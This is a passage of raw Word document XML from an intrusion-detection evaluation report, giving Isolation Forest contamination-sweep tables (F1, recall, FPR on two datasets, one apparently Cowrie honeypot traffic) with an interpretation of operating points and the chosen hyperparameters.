          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0079</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2 (ROC-AUC = 0.6768 at every setting)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contamination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2633</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1649</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0292</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3842</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3048</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0940</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.4615</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.4760</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1957</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.4569</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5595</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2967</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wrapper (fixed 0.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1431</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0793</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0097</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FPR ≈ contamination, almost exactly.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> D1 delivers FPR 0.047/0.088/0.189/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.287 against requested 0.05/0.10/0.20/0.30 (D2: 0.029/0.094/0.196/0.297).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Because the forest is fitted on benign training rows only, "flag the top-c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>fraction of benign-training scores" transfers near-perfectly to benign test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>traffic — the benign score distribution generalises. Operationally this makes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>direct false-alarm budget</w:t>
      </w:r>
      <w:r>
        <w:t>: choose c equal to the FPR the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>SOC can absorb, and that is what it will get.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 is low at every operating point, and the peak is shallow.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The best F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(0.641 at c=0.10 on D1; 0.462 at c=0.20 on D2) confirms IF cannot compete as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a standalone detector — with ROC-AUC 0.81/0.68 there is no threshold at which</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>an unsupervised ranker matches the supervised models (RF 0.80/0.76,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>XGBoost-hybrid higher still). The D1→D2 drop is the familiar operational-data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>story: on live Cowrie traffic, benign and attack score distributions overlap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">far more (AUC 0.677), so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> operating point is worse — at c=0.30, D2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>recall is still only 0.56.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**The operating point is set for recall retention, not F1 — and the sweep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shows why F1-optimising contamination would be the wrong choice.** Even the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>most permissive swept setting (c=0.30, with 3.3× the F1-optimal false-alarm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rate on D1 and 1.5× on D2) retains only 73% (D1) / 56% (D2) of attacks — a stage-1 filter that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>silently discards 27–44% of attacks caps the whole cascade's recall at that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>value, no matter how good stage 2 is. That is why the production cascade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ignores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contamination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entirely and calibrates its clearing threshold on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attack-score quantile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>stage1_retain_recall = 0.99</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/ensemble.py</w:t>
      </w:r>
      <w:r>
        <w:t>): the threshold is placed so ~99% of training attacks score</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>above it, and only what is confidently benign below it gets cleared. F1 is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>simply not the objective at stage 1; recall retention is.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>**The fixed-threshold wrapper rows explain the "headline" standalone IF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>numbers.** The summary-table standalone results are produced by the wrapper's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>fixed 0.5 min-max threshold, which lands in an extreme-precision corner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(recall 0.15 / FPR 0.008 on D1) — hence standalone F1 ≈ 0.25/0.14 on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>43-feature set. The gap between that and the calibrated sweep (F1 0.64 at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>c=0.10 on D1) shows the standalone figure understates the detector's ranking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>quality; it is a threshold-placement artefact. We keep it in the summary table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>for honesty — it is the operating point the standalone artefact actually</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ships — but the cascade, which consumes the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>scores</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather than the fixed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>threshold, is the intended consumer of this model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chosen setting — Isolation Forest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hyperparameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chosen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contamination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (production)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Irrelevant to the cascade (which thresholds on recall retention) and to the wrapper's fixed-0.5 predict; kept as an honest mid-range declaration of expected anomaly share. If IF were deployed standalone as a tripwire, set c = the SOC's FPR budget (the sweep shows FPR ≈ c).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>300</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (pinned)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Score stability; capacity does not lift AUC (the ranking, not the ensemble size, is the bottleneck).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_samples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (pinned)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Standard subsampling for isolation depth diversity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-model synthesis (RF/IF)</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r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
